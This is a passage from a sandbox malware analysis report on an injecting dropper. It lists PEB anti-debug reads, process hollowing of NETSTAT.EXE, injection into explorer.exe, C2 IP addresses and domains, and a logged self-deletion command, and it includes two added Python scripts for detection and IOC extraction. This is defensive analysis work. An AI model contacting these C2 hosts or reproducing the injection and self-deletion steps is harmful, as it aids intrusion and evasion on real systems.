          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03504015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03504015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0350740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0350740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0350740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0344B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0344B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0344B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0344B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03508CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034CB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034358EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03439080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0344849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034790AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeMemory allocated: page read and write | page guard
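The many "mov eax, dword ptr fs:[00000030h]" entries and the rdtsc function listed above are the raw instruction patterns behind the "reads the PEB" and "RDTSC time measurement" signatures: fs:[30h] holds the PEB pointer in 32-bit (WoW64) code, and the PEB's BeingDebugged and NtGlobalFlag fields are the usual next read. The following scanner is an added example, not part of the sandbox report and not the sample's own code; it encodes those instructions as bytes and locates them in a dumped code region. The SAMPLE blob is constructed for the demonstration and its offsets are not the report's addresses.

```python
"""Locate the anti-analysis instruction patterns the report lists above.

Added example, not part of the sandbox report and not the sample's code.
It encodes "mov eax, dword ptr fs:[30h]" (PEB pointer read, 32-bit/WoW64)
and "rdtsc" as raw x86 bytes and scans a dumped region for them. SAMPLE
is constructed for the demo; its offsets are not the report's addresses.
"""
from typing import Dict, List, Tuple

# 0x64 = FS segment override. A1 is "mov eax, moffs32"; 8B /r with a
# disp32-only ModRM (0x05 + reg<<3) covers the other general registers.
PEB_FS30 = {
    b"\x64\xa1\x30\x00\x00\x00":     "mov eax, dword ptr fs:[30h]",
    b"\x64\x8b\x05\x30\x00\x00\x00": "mov eax, dword ptr fs:[30h]",
    b"\x64\x8b\x0d\x30\x00\x00\x00": "mov ecx, dword ptr fs:[30h]",
    b"\x64\x8b\x15\x30\x00\x00\x00": "mov edx, dword ptr fs:[30h]",
    b"\x64\x8b\x1d\x30\x00\x00\x00": "mov ebx, dword ptr fs:[30h]",
    b"\x64\x8b\x35\x30\x00\x00\x00": "mov esi, dword ptr fs:[30h]",
    b"\x64\x8b\x3d\x30\x00\x00\x00": "mov edi, dword ptr fs:[30h]",
}
# Native x64 code keeps the PEB pointer at gs:[0x60] instead; not expected in
# this SysWOW64 sample, but cheap to include when the dump is 64-bit.
PEB_GS60 = {b"\x65\x48\x8b\x04\x25\x60\x00\x00\x00": "mov rax, qword ptr gs:[60h]"}
RDTSC = b"\x0f\x31"


def find_all(blob: bytes, needle: bytes) -> List[int]:
    """All offsets of needle in blob (plain bytes.find, no regex)."""
    hits, i = [], blob.find(needle)
    while i != -1:
        hits.append(i)
        i = blob.find(needle, i + 1)
    return hits


def scan_peb_reads(blob: bytes) -> List[Tuple[int, str]]:
    """(offset, mnemonic) for every PEB-pointer read; fs:[18h] (TEB) etc. do not match."""
    hits = []
    for pattern, mnemonic in {**PEB_FS30, **PEB_GS60}.items():
        hits += [(off, mnemonic) for off in find_all(blob, pattern)]
    return sorted(hits)


def scan_rdtsc_pairs(blob: bytes, window: int = 64) -> List[Tuple[int, int]]:
    """Offsets of two rdtsc instructions within `window` bytes of each other.

    A lone 0F 31 is weak evidence (it occurs in data by chance); two reads
    close together, with the delta compared afterwards, is the usual
    VM/debugger timing check."""
    offsets = find_all(blob, RDTSC)
    return [(a, b) for a, b in zip(offsets, offsets[1:]) if b - a <= window]


def summarize(blob: bytes) -> Dict[str, int]:
    return {"peb_reads": len(scan_peb_reads(blob)),
            "rdtsc_pairs": len(scan_rdtsc_pairs(blob))}


# Constructed region: BeingDebugged check, rdtsc timing pair, NtGlobalFlag read,
# plus a TEB self-pointer read (fs:[18h]) that must NOT count as a PEB read.
SAMPLE = (
    b"\x55\x8b\xec" +                  # push ebp; mov ebp, esp
    b"\x64\xa1\x30\x00\x00\x00" +      # mov eax, fs:[30h]            (PEB)
    b"\x0f\xb6\x40\x02" +              # movzx eax, byte ptr [eax+2]  (PEB.BeingDebugged)
    b"\x85\xc0\x75\x10" +              # test eax, eax; jnz short
    b"\x64\xa1\x18\x00\x00\x00" +      # mov eax, fs:[18h]            (TEB, benign)
    b"\x0f\x31" +                      # rdtsc
    b"\x8b\xd8" + b"\x90" * 6 +        # mov ebx, eax; padding
    b"\x0f\x31" +                      # rdtsc
    b"\x2b\xc3" +                      # sub eax, ebx                 (tick delta)
    b"\x64\x8b\x0d\x30\x00\x00\x00" +  # mov ecx, fs:[30h]            (PEB)
    b"\x8b\x41\x68" +                  # mov eax, [ecx+68h]           (PEB.NtGlobalFlag)
    b"\xc3"                            # ret
)

if __name__ == "__main__":
    for off, mnem in scan_peb_reads(SAMPLE):
        print(f"{off:#06x}  {mnem}")
    print("rdtsc pairs:", scan_rdtsc_pairs(SAMPLE), summarize(SAMPLE))
```

Run it against a dumped region (for instance the NETSTAT.EXE image at 0x0343xxxx from the report) after confirming the region is code; byte matching alone will also hit these sequences inside data, so treat the offsets as candidates to confirm in a disassembler.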

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe | Network Connect: 184.168.131.241 80
          Source: C:\Windows\explorer.exe | Network Connect: 156.241.53.21 80
          Source: C:\Windows\explorer.exe | Network Connect: 199.34.228.66 80
          Source: C:\Windows\explorer.exe | Domain query: www.sh-zzjy.com
          Source: C:\Windows\explorer.exe | Network Connect: 156.241.53.248 80
          Source: C:\Windows\explorer.exe | Network Connect: 46.137.146.55 80
          Source: C:\Windows\explorer.exe | Network Connect: 104.143.9.211 80
          Source: C:\Windows\explorer.exe | Domain query: www.nirvananaturalcbd.net
          Source: C:\Windows\explorer.exe | Domain query: www.boicity.com
          Source: C:\Windows\explorer.exe | Domain query: www.zrcezzfdfkyjlir.com
          Source: C:\Windows\explorer.exe | Domain query: www.iafzal.com
          Source: C:\Windows\explorer.exe | Domain query: www.updates-app.com
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Memory written: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Thread register set: target process: 3424
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Thread register set: target process: 3424
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Thread register set: target process: 3424
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: BB0000
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Process created: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe'
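Read together, the entries in this section describe one chain: the dropper writes a PE image (MZ header at base 0x400000) into a second instance of itself, unmaps the image of NETSTAT.EXE and maps executable sections into it, both of them set thread context and queue an APC in explorer.exe (PID 3424), explorer.exe then carries all the C2 traffic, and NETSTAT.EXE removes the dropper with cmd /c del. The script below is an added example, not part of the sandbox report and not FormBook code: it parses those entries into IOCs and an injection graph and derives the same behavioural flags from the data. REPORT_LINES are the section's own entries with the source and event columns separated by " | " (the parser also accepts them run together, as raw extraction leaves them); the column layout and the flagging rules are this example's assumptions.

```python
"""Turn the injection and network lines of the section above into IOCs, an
injection graph and a short list of flagged behaviours.

Added example, not part of the sandbox report and not FormBook code.
REPORT_LINES are copied from the section above with the source and event
columns separated by ' | ' (run-together lines are accepted too); the
flagging rules are this example's choices, not the report's.
"""
import re
from collections import defaultdict
from typing import Dict, List, Optional, Set

REPORT_LINES = r"""
Source: C:\Windows\explorer.exe | Network Connect: 184.168.131.241 80
Source: C:\Windows\explorer.exe | Network Connect: 156.241.53.21 80
Source: C:\Windows\explorer.exe | Network Connect: 199.34.228.66 80
Source: C:\Windows\explorer.exe | Domain query: www.sh-zzjy.com
Source: C:\Windows\explorer.exe | Network Connect: 156.241.53.248 80
Source: C:\Windows\explorer.exe | Network Connect: 46.137.146.55 80
Source: C:\Windows\explorer.exe | Network Connect: 104.143.9.211 80
Source: C:\Windows\explorer.exe | Domain query: www.nirvananaturalcbd.net
Source: C:\Windows\explorer.exe | Domain query: www.boicity.com
Source: C:\Windows\explorer.exe | Domain query: www.zrcezzfdfkyjlir.com
Source: C:\Windows\explorer.exe | Domain query: www.iafzal.com
Source: C:\Windows\explorer.exe | Domain query: www.updates-app.com
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Memory written: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Thread register set: target process: 3424
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Thread register set: target process: 3424
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: BB0000
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Process created: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe'
""".strip().splitlines()

KINDS = ("Network Connect", "Domain query", "Memory written", "Section loaded",
         "Thread register set", "Thread APC queued", "Section unmapped", "Process created")
INJECT_KINDS = {"Memory written", "Section loaded", "Thread APC queued",
                "Thread register set", "Section unmapped"}
# Non-greedy source, optional ' | ', then a known event name: handles both layouts.
LINE_RE = re.compile(r"^Source:\s*(?P<src>.+?)\s*\|?\s*(?P<kind>%s):\s*(?P<detail>.*)$" % "|".join(KINDS))
IP_PORT_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3})\s+(\d{1,5})$")
EXE_RE = re.compile(r"[A-Za-z]:\\\S+?\.exe", re.I)   # first Windows path ending in .exe
PID_RE = re.compile(r"target process:\s*(\d+)")


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def parse_line(line: str) -> Optional[Dict[str, str]]:
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    event = m.groupdict()
    event["proc"] = basename(event["src"])   # acting process, e.g. explorer.exe
    return event


def parse_report(lines: List[str]) -> List[Dict[str, str]]:
    return [e for e in map(parse_line, lines) if e]


def extract_iocs(events: List[Dict[str, str]]) -> Dict[str, Set[str]]:
    iocs: Dict[str, Set[str]] = {k: set() for k in ("ips", "ports", "domains", "connecting_procs")}
    for e in events:
        if e["kind"] == "Network Connect" and (m := IP_PORT_RE.match(e["detail"])):
            iocs["ips"].add(m.group(1)); iocs["ports"].add(m.group(2))
            iocs["connecting_procs"].add(e["proc"])
        elif e["kind"] == "Domain query":
            iocs["domains"].add(e["detail"].lower())
            iocs["connecting_procs"].add(e["proc"])
    return iocs


def injection_edges(events: List[Dict[str, str]]) -> Dict[str, Set[str]]:
    """injecting process -> targets (basename, or 'pid:N' when only a PID was logged)."""
    edges: Dict[str, Set[str]] = defaultdict(set)
    for e in events:
        if e["kind"] not in INJECT_KINDS:
            continue
        if m := EXE_RE.search(e["detail"]):
            edges[e["proc"]].add(basename(m.group(0)))
        elif p := PID_RE.search(e["detail"]):
            edges[e["proc"]].add("pid:" + p.group(1))
    return dict(edges)


def flag_behaviours(events: List[Dict[str, str]]) -> List[str]:
    flags = []
    targets = {t for ts in injection_edges(events).values() for t in ts}
    # A process that was injected into and then talks to the network: the
    # "system process connects to network" signature, derived from the data
    # rather than from a fixed list of Windows binaries.
    for proc in sorted(extract_iocs(events)["connecting_procs"] & targets):
        flags.append(f"{proc}: injection target that originates network traffic (C2 from injected code)")
    for e in events:
        d = e["detail"]
        if e["kind"] == "Memory written" and "4D5A" in d.upper():
            flags.append(f"{e['proc']}: writes an MZ header into a process (PE injection)")
        elif e["kind"] == "Section unmapped" and (m := EXE_RE.search(d)):
            flags.append(f"{e['proc']}: unmaps the image of {basename(m.group(0))} (process hollowing)")
        elif e["kind"] == "Process created" and re.search(r"cmd\.exe\s+/c\s+del\b", d, re.I):
            flags.append(f"{e['proc']}: runs cmd /c del on the dropper (self-deletion)")
    return flags
```

Usage: `evs = parse_report(REPORT_LINES)`, then `extract_iocs(evs)` gives the six C2 IPs, port 80 and the six domains with explorer.exe as the only connecting process, `injection_edges(evs)` shows the dropper reaching its own second instance, NETSTAT.EXE, explorer.exe and PID 3424 with NETSTAT.EXE in turn reaching explorer.exe and PID 3424, and `flag_behaviours(evs)` returns four flags. The "Thread register set" entries only carry a PID, so correlating pid:3424 with explorer.exe needs the process tree from the report, which these lines do not contain.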
          Source: explorer.exe, 00000005.00000000.731475226.0000000000AD8000.00000004.00000020.sdmp | Binary or memory string: ProgmanMD6
          Source: explorer.exe, 00000005.00000000.732145688.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 0000000A.00000002.904021838.0000000005A30000.00000002.00000001.sdmp | Binary or memory string: Program Manager
          Source: explorer.exe, 00000005.00000000.732145688.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 0000000A.00000002.904021838.0000000005A30000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.732145688.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 0000000A.00000002.904021838.0000000005A30000.00000002.00000001.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.732145688.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 0000000A.00000002.904021838.0000000005A30000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
          Source: explorer.exe, 00000005.00000000.721395078.000000000A715000.00000004.00000001.sdmp | Binary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
